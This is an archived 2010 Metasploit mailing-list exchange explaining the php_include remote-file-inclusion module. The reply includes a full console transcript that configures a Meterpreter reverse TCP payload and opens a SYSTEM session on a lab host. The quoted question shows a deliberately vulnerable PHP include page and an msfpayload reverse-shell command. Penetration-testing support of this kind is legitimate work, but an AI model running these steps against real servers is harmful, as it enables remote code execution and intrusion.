metasploit-framework July 2010 archive
Main Archive Page > Month Archives  > metasploit-framework archives
metasploit-framework: Re: [framework] php_include confusion

Re: [framework] php_include confusion

From: <egypt_at_nospam>
Date: Tue Jul 13 2010 - 00:01:33 GMT
To: jeffs@speakeasy.net

PHP is no longer configured to be vulnerable to this class of exploits
by default. If you want to play with it, you'll need to set
allow_url_include to true in your php.ini.

XXpathXX gets replaced with the URL of the payload. There are several
ways you could have discovered this yourself. The easiest way is to
modify the exploit to print out the request before sending it.
Alternatively, you could run a sniffer or just read the code, which
may be a good idea anyway since you appear to have some misconceptions
about what this exploit does. You don't need to generate the payload
and you don't need to host it anywhere else; everything needed to run
arbitrary code is contained in the exploit.

The following is a transcript of the exploit working as expected:

msf exploit(php_include) > show options

Module options:

   Name Current Setting Required Description
   ---- --------------- -------- -----------
   PATH / yes The base
directory to prepend to the URL to try
   PHPRFIDB no A local file
containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI /vuln/test.php?path=XXpathXX no The URI to
request, with the include parameter changed to XXpathXX
   Proxies no Use a proxy chain
   RHOST 192.168.99.129 yes The target address
   RPORT 80 yes The target port
   SRVHOST 192.168.99.1 yes The local host to
listen on.
   SRVPORT 8080 yes The local port to
listen on.
   URIPATH /foo no The URI to use
for this exploit (default is random)
   VHOST no HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name Current Setting Required Description
   ---- --------------- -------- -----------
   LHOST 192.168.99.1 yes The listen address
   LPORT 4444 yes The listen port

Exploit target:

   Id Name
   -- ----
   0 Automatic

msf exploit(php_include) > exploit

[*] Started reverse handler on 192.168.99.1:4444
[*] Using URL: http://192.168.99.1:8080/foo
[*] PHP include server started.
[*] Sending stage (33846 bytes) to 192.168.99.129
[*] Meterpreter session 4 opened (192.168.99.1:4444 ->
192.168.99.129:1415) at Mon Jul 12 17:55:48 -0600 2010

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter >

Hope this helped,
egypt

On Mon, Jul 12, 2010 at 5:07 PM, Jeffs <jeffs@speakeasy.net> wrote:
> In metapsloit when using the /unix/webapp/php_include the attacker is asked
> to include a value for PHPURI such as
> /slogin_lib.inc.php?slogin_path=XXpathXX
>
> Regarding the XXpathXX value, am I correct to assume this passes through to
> the metasploit engine to construct an obfuscated string that is then sent to
> the vulnerable site, appended to the URL automatically?
>
> All documentation and information on using this exploit suggests that if you
> are not going to use the PHPRFIDB setting, to leave this as "XXpathXX".
>
> However all my experimentation does not send a specific url to the
> vulnerable site as is demonstrated in several videos on this subject.
>
> I know my rhost and lhost are correct, along with all other settings. The
> apache server runs php and is accessible. The metapsloit service just hangs
> at:
>
> [*] PHP include server started.
>
>
> index_test.php looks like this:
>
> <html>
> <body>
> <? require $_GET['include'] ?>
> </body>
> </html>
>
>
> and include.php.txt was created properly with msfpayload as such.
>
> ./msfpayload php/reverse_php LHOST=192.168.1.101 R >
> /var/www/include.php.txt
>
> Both files on the are the web server in the proper directories.
>
> If someone could clarify the XXpathXX value for me that would be greatly
> appreciated.
>
> Thanks much
>
> jeffs
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
>
>
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework